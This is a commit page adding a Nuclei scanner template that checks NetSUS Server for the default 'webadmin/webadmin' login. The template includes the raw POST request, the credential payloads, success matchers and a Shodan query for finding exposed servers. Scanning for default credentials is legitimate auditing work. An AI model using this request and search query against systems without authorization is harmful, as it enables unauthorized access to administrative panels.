Merge pull request #3682 from projectdiscovery/netsus-default-login
Create netsus-default-login.yamlpatch-1
commit
6dc2147857
|
@ -0,0 +1,37 @@
|
|||
id: netsus-default-login
|
||||
|
||||
info:
|
||||
name: NetSUS Server Default Login
|
||||
author: princechaddha
|
||||
severity: high
|
||||
metadata:
|
||||
shodan-query: 'http.title:"NetSUS Server Login"'
|
||||
tags: netsus,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /webadmin/index.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
loginwith=suslogin&username={{username}}&password={{password}}&submit=
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- webadmin
|
||||
password:
|
||||
- webadmin
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'Location: dashboard.php'
|
||||
- 'PHPSESSID='
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
Loading…
Reference in New Issue